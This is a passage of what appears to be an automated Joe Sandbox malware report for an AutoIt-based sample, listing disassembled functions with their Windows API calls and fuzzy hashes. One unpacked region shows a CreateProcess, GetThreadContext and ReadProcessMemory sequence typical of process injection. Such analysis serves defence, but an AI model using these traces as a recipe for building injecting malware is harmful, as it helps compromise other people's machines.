              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: IconLoadNotifyShell_String_wcslen
              • String ID: Line:
              • API String ID: 2289894680-1585850449
              • Opcode ID: 22f38ca05b49689f4b5831bfc65b7514d809a8680b9cb5b6447212e6e844c1f2
              • Instruction ID: 0354fac024e60cba6414f79df7e83547fb0b576bcdba87e76b01c74a7e09d29a
              • Opcode Fuzzy Hash: 22f38ca05b49689f4b5831bfc65b7514d809a8680b9cb5b6447212e6e844c1f2
              • Instruction Fuzzy Hash: 6531E171908324AED761EF20DC45BEBB7D9AB81710F00492FF59982391EB749A48C7DB
              Function 006D2DE3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON
              Download Yara Rule
              APIs
              • GetOpenFileNameW.COMDLG32(?), ref: 00712C8C
                • Part of subcall function 006D3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,006D3A97,?,?,006D2E7F,?,?,?,00000000), ref: 006D3AC2
                • Part of subcall function 006D2DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 006D2DC4
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Name$Path$FileFullLongOpen
              • String ID: X$`ey
              • API String ID: 779396738-2559956516
              • Opcode ID: e94d857ff92967d5dc60788d4c5aeac331d5f787aa5bd4110fd4c6f216114c4d
              • Instruction ID: f3acd069783520a3427f4d5b7f73361928434ce1b4181c12e51c1640b2e94f7e
              • Opcode Fuzzy Hash: e94d857ff92967d5dc60788d4c5aeac331d5f787aa5bd4110fd4c6f216114c4d
              • Instruction Fuzzy Hash: 8F21D571E002989FCF41EF94D805BEE7BFDAF49304F00805AE505A7381DBB85A898FA5
              Function 006EFDDB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
              Download Yara Rule
              APIs
              • __CxxThrowException@8.LIBVCRUNTIME ref: 006F0668
                • Part of subcall function 006F32A4: RaiseException.KERNEL32(?,?,?,006F068A,?,007A1444,?,?,?,?,?,?,006F068A,006D1129,00798738,006D1129), ref: 006F3304
              • __CxxThrowException@8.LIBVCRUNTIME ref: 006F0685
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Exception@8Throw$ExceptionRaise
              • String ID: Unknown exception
              • API String ID: 3476068407-410509341
              • Opcode ID: 04cd2d4aece033e5f30fe1706565f04eb0b4b2fff5dc98304b1211b91dd42301
              • Instruction ID: b9d73844da9c657c03d5d666fbaf22f2a80c3876ad2761b0dae18602de265253
              • Opcode Fuzzy Hash: 04cd2d4aece033e5f30fe1706565f04eb0b4b2fff5dc98304b1211b91dd42301
              • Instruction Fuzzy Hash: 81F0AF2490030D678F40BBA5EC46CBE7B6E5E40350B604139BA14D6697EF71EA268685
              Function 00743017 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
              Download Yara Rule
              APIs
              • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 0074302F
              • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00743044
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Temp$FileNamePath
              • String ID: aut
              • API String ID: 3285503233-3010740371
              • Opcode ID: 12435f73c79b8c93f44dd01208a040813a5f9e4d8c42e0d4135ebda64f38900d
              • Instruction ID: c0ca576805dbb845f597cac923ba711d507ade49646d5fa07fe5abf165e31afc
              • Opcode Fuzzy Hash: 12435f73c79b8c93f44dd01208a040813a5f9e4d8c42e0d4135ebda64f38900d
              • Instruction Fuzzy Hash: B9D05B715003146BDA209794EC0DFD73A6CD704750F004251BA96D6091DAF89544CAD4
              Function 00757F59 Relevance: 4.9, APIs: 3, Instructions: 430COMMON
              Download Yara Rule
              APIs
              • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 007582F5
              • TerminateProcess.KERNEL32(00000000), ref: 007582FC
              • FreeLibrary.KERNEL32(?,?,?,?), ref: 007584DD
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Process$CurrentFreeLibraryTerminate
              • String ID:
              • API String ID: 146820519-0
              • Opcode ID: 24c73e08cb2023b97aac20ce09ac73ba743f85452ce88929c1b519645db0b259
              • Instruction ID: 492b68a35eb308cde17d29ef77a5c1290b98a34d2730457b71771603d70e04b6
              • Opcode Fuzzy Hash: 24c73e08cb2023b97aac20ce09ac73ba743f85452ce88929c1b519645db0b259
              • Instruction Fuzzy Hash: 75128971A08341CFC754DF28C484B6ABBE1BF88315F04895DE8999B392DB74ED49CB92
              Function 006D10F3 Relevance: 4.7, APIs: 3, Instructions: 153comCOMMON
              Download Yara Rule
              APIs
                • Part of subcall function 006D1BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 006D1BF4
                • Part of subcall function 006D1BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 006D1BFC
                • Part of subcall function 006D1BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 006D1C07
                • Part of subcall function 006D1BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 006D1C12
                • Part of subcall function 006D1BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 006D1C1A
                • Part of subcall function 006D1BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 006D1C22
                • Part of subcall function 006D1B4A: RegisterWindowMessageW.USER32(00000004,?,006D12C4), ref: 006D1BA2
              • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 006D136A
              • OleInitialize.OLE32 ref: 006D1388
              • CloseHandle.KERNEL32(00000000,00000000), ref: 007124AB
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
              • String ID:
              • API String ID: 1986988660-0
              • Opcode ID: 0bcfe639f88879c6f69d3b224a70e40c5c3f1fd45fd58c7fb386079a14c7a82a
              • Instruction ID: 9f17bce51822351b02d89f9c5d9e550283cde2b9cd763b378b77b8fce3830cc7
              • Opcode Fuzzy Hash: 0bcfe639f88879c6f69d3b224a70e40c5c3f1fd45fd58c7fb386079a14c7a82a
              • Instruction Fuzzy Hash: 0771ADB8D053508EE388DF79A8556653AE1BBCB394B84C22ED41ACB361EB3C4450CF4D
              Function 007086AE Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • FindCloseChangeNotification.KERNELBASE(00000000,00000000,?,?,007085CC,?,00798CC8,0000000C), ref: 00708704
              • GetLastError.KERNEL32(?,007085CC,?,00798CC8,0000000C), ref: 0070870E
              • __dosmaperr.LIBCMT ref: 00708739
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: ChangeCloseErrorFindLastNotification__dosmaperr
              • String ID:
              • API String ID: 490808831-0
              • Opcode ID: 1f3ace2534ec1a84c40c088d125207bb0b5266ea70c8fa8b1b060441bec4b30f
              • Instruction ID: 692483a3ab54d14df2aed2cacb12682a3488c419d939deebaf568e5245d38394
              • Opcode Fuzzy Hash: 1f3ace2534ec1a84c40c088d125207bb0b5266ea70c8fa8b1b060441bec4b30f
              • Instruction Fuzzy Hash: 6E018232604220D6C6A06374984977F6BC54B92778F3A0319F8449B1D3DEAECC818696
              Function 00742FD8 Relevance: 4.5, APIs: 3, Instructions: 27filetimeCOMMON
              Download Yara Rule
              APIs
              • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,00000000,?,?,00742CD4,?,?,?,00000004,00000001), ref: 00742FF2
              • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00742CD4,?,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00743006
              • CloseHandle.KERNEL32(00000000,?,00742CD4,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0074300D
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: File$CloseCreateHandleTime
              • String ID:
              • API String ID: 3397143404-0
              • Opcode ID: 4df2f300734c34f3ecb1ca41f86b93a254bf06f43d938499bfbbbc7d656619c2
              • Instruction ID: dd4e283d859ded6fdf0dd26c028b53e92d08271436bc54c910d74d90e3d2b355
              • Opcode Fuzzy Hash: 4df2f300734c34f3ecb1ca41f86b93a254bf06f43d938499bfbbbc7d656619c2
              • Instruction Fuzzy Hash: BCE0863228031477D6352756BC0DF9B3A5CD786B71F118210F7AA751D086E5250142AC
              Function 006E1310 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 531COMMON
              Download Yara Rule
              APIs
              • __Init_thread_footer.LIBCMT ref: 006E17F6
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Init_thread_footer
              • String ID: CALL
              • API String ID: 1385522511-4196123274
              • Opcode ID: eee7d7533a28968890ee83adcecab7fbe589680f0c135e2555e7e31d0d684d51
              • Instruction ID: f6da508861ad4953d508e1535e926df3e83e9875443ea41a12b65b0f5a42479b
              • Opcode Fuzzy Hash: eee7d7533a28968890ee83adcecab7fbe589680f0c135e2555e7e31d0d684d51
              • Instruction Fuzzy Hash: AE22BEB0609381DFC714DF15C480A2ABBF2BF86314F24895EF4968B3A2D735E955DB82
              Function 00746EF1 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 297COMMON
              Download Yara Rule
              APIs
              • _wcslen.LIBCMT ref: 00746F6B
                • Part of subcall function 006D4ECB: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,007A1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 006D4EFD
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: LibraryLoad_wcslen
              • String ID: >>>AUTOIT SCRIPT<<<
              • API String ID: 3312870042-2806939583
              • Opcode ID: 6a1e7189b1a9f4296f1e9270f09763060aed262772cde34d576fae3515eb885b
              • Instruction ID: ba556efb17790d468b4679f8ad39c5c8b89a74873f183d39f8a95131d7afef9c
              • Opcode Fuzzy Hash: 6a1e7189b1a9f4296f1e9270f09763060aed262772cde34d576fae3515eb885b
              • Instruction Fuzzy Hash: C9B181315082018FCB58EF24D49196EB7E6BF94310F04895EF896973A2EF34ED49CB96
              Function 00742557 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50COMMON
              Download Yara Rule
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: __fread_nolock
              • String ID: EA06
              • API String ID: 2638373210-3962188686
              • Opcode ID: 2aaa211946ca004be0fbfac83bf44f52a32881ab08cbab255393847560222f4a
              • Instruction ID: 23abeb72c3a8032d126283f335a7ac7ed2691ffe952cb8db910ec02898426db4
              • Opcode Fuzzy Hash: 2aaa211946ca004be0fbfac83bf44f52a32881ab08cbab255393847560222f4a
              • Instruction Fuzzy Hash: 9F01B5729042587EDF58D7A8CC56EBEBBF8DB05305F00459EF252D21C2E5B9E7188B60
              Function 006D3837 Relevance: 3.1, APIs: 2, Instructions: 77windowCOMMON
              Download Yara Rule
              APIs
              • Shell_NotifyIconW.SHELL32(00000000,?), ref: 006D3908
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: IconNotifyShell_
              • String ID:
              • API String ID: 1144537725-0
              • Opcode ID: adb28ec2223352f5104074ac1a07ba821361ee7aaaf62b0607d5f67549f1b09c
              • Instruction ID: 79c42ccf176c1bb4e22486b7fba26b862c6b782aefb7d067f0c048c44b7b10dd
              • Opcode Fuzzy Hash: adb28ec2223352f5104074ac1a07ba821361ee7aaaf62b0607d5f67549f1b09c
              • Instruction Fuzzy Hash: 29317F709043119FE761DF24D885797BBE8FB49708F00092EF59A97380E7B5AA44CB56
              Function 015C129D Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
              Download Yara Rule
              APIs
              • CreateProcessW.KERNELBASE(?,00000000), ref: 015C1A5B
              • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 015C1AF1
              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 015C1B13
              Memory Dump Source
              • Source File: 00000000.00000002.2127882402.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_15c0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Process$ContextCreateMemoryReadThreadWow64
              • String ID:
              • API String ID: 2438371351-0
              • Opcode ID: 45c0bcdfd50c24934144be52d4489c8f4aeee23b26077383fd0484b0fd6f3e51
              • Instruction ID: 290e586d83c023560375128fe4b0b6ad46a6e6a3487f0249fb8dfae510fcf06d
              • Opcode Fuzzy Hash: 45c0bcdfd50c24934144be52d4489c8f4aeee23b26077383fd0484b0fd6f3e51
              • Instruction Fuzzy Hash: 3E12DC24A24658C6EB24DF64D8507DEB232FF68700F1090E9910DEB7A5E77A4E81CF5A
              Function 006D4ECB Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON
              Download Yara Rule
              APIs
                • Part of subcall function 006D4E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,006D4EDD,?,007A1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 006D4E9C
                • Part of subcall function 006D4E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 006D4EAE
                • Part of subcall function 006D4E90: FreeLibrary.KERNEL32(00000000,?,?,006D4EDD,?,007A1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 006D4EC0
              • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,007A1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 006D4EFD
                • Part of subcall function 006D4E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00713CDE,?,007A1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 006D4E62
                • Part of subcall function 006D4E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 006D4E74
                • Part of subcall function 006D4E59: FreeLibrary.KERNEL32(00000000,?,?,00713CDE,?,007A1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 006D4E87
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Library$Load$AddressFreeProc
              • String ID:
              • API String ID: 2632591731-0
              • Opcode ID: 3384d938227856286177b584c6346504aad8db13baf462737e5054dba906d9d4
              • Instruction ID: 3769fc95d8d3bfc9fa5135d166221eefd0471c2d829a7552919076a1cec7f099
              • Opcode Fuzzy Hash: 3384d938227856286177b584c6346504aad8db13baf462737e5054dba906d9d4
              • Instruction Fuzzy Hash: C511E332A10205ABCB14AF64DC06FAD77A6AF80710F10842FF542A62E1EE759E4597A8
              Function 00708402 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: __wsopen_s
              • String ID:
              • API String ID: 3347428461-0
              • Opcode ID: 8f691da837c2b9d5e3b2184535bbfddf57517aa4d00098b90e1ff1029d6efb54
              • Instruction ID: 9e74547d622ed3aa9fcfc4ab4b14abffb69a5afdee45ef2d717e5a564d98165f
              • Opcode Fuzzy Hash: 8f691da837c2b9d5e3b2184535bbfddf57517aa4d00098b90e1ff1029d6efb54
              • Instruction Fuzzy Hash: A911487190410AEFCB05DF58E9459DE7BF4EF48300F104159F808AB352DA30EA11CBA5
              Function 00705000 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE
              Download Yara Rule
              APIs
                • Part of subcall function 00704C7D: RtlAllocateHeap.NTDLL(00000008,006D1129,00000000,?,00702E29,00000001,00000364,?,?,?,006FF2DE,00703863,007A1444,?,006EFDF5,?), ref: 00704CBE
              • _free.LIBCMT ref: 0070506C
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: AllocateHeap_free
              • String ID:
              • API String ID: 614378929-0
              • Opcode ID: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
              • Instruction ID: 11cf934ffb77c74cd605304aa006e28a374b8a00ecd16baae9fbab7f5e5de82b
              • Opcode Fuzzy Hash: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
              • Instruction Fuzzy Hash: 13012672204704EBE3218E65D885A5BFBECFB89370F250B1DE184972C0EA34A805CAB4
              Function 006FE602 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
              • Instruction ID: 01e240f1e917896abc80fe4516ec04b53bd0c628eb0e8dd1ba13734fee0edde0
              • Opcode Fuzzy Hash: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
              • Instruction Fuzzy Hash: 52F0F932510A1CD6C6313E698C09BBA37DA9F52335F100719F721D62E2DF75A40286AA
              Function 00704C7D Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • RtlAllocateHeap.NTDLL(00000008,006D1129,00000000,?,00702E29,00000001,00000364,?,?,?,006FF2DE,00703863,007A1444,?,006EFDF5,?), ref: 00704CBE
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: AllocateHeap
              • String ID:
              • API String ID: 1279760036-0
